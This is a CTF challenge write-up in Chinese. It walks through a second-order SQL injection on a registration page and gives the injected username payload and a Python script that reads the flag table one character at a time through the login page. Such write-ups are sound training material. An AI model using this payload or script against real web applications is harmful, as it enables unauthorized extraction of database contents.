进入题目后各种按钮按了都没有反应
    御剑扫了一下文件
    ![B9S~47W54[JZ9)NNM%O@S5.png](https://cdn.nlark.com/yuque/0/2021/png/22602434/1633483928528-2fb4e68d-34d3-4add-8027-a1f56c07f60f.png#clientId=u656bc0e0-a831-4&from=drop&height=310&id=ufc3db61f&margin=%5Bobject%20Object%5D&name=B9S~47W54%5BJZ9%29NNM%25O%40S5.png&originHeight=682&originWidth=926&originalType=binary&ratio=1&size=54070&status=done&style=none&taskId=u9932765e-a566-461b-a4ec-79df4295611&width=421.4000244140625)
    发现了register.php文件 估计注入点在register.php页面上
    在注册界面创建了一个账号root 密码123456 登录进去
    这里应该会用到插入数据库的语句

    1. insert into users(username,password) values('root',123456)

    想了想这里可能可以利用二次注入 尝试一下

    1. email:cyh@qq.com
    2. username:0' + ascii(substr((select database()) from 1 for 1)) + '0
    3. password:admin

    T3)ZCRIY$7T_$1EWX]8CEW0.png
    这里可以写一个python脚本来获取数据

    1. import requests
    2. import re
    4. def SQL():
    5.     global register_url,login_url
    6.     for i in range(1,100):
    7.         register_payload = {
    8.             'email' : '333{}@qq.com'.format(i),
    9.             'username' : "0' + ascii(substr((select * from flag) from {} for 1)) + '0".format(i),
    10.             'password' : 'admin'
    11.         }   
    12.         res1 = requests.post(url=register_url,data=register_payload)
    13.         login_payload = {
    14.             'email' : '333{}@qq.com'.format(i),
    15.             'password' : 'admin'
    16.         }
    17.         res2 = requests.post(url=login_url,data=login_payload)
    18.         #<span class="user-name">119</span>
    19.         code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',res2.text)
    20.         print(chr(int(code.group(1))),end='')
    22. if __name__=="__main__":
    23.     register_url = "http://111.200.241.244:65486/register.php"
    24.     login_url = "http://111.200.241.244:65486/login.php"
    25.     SQL()

    运行得到flag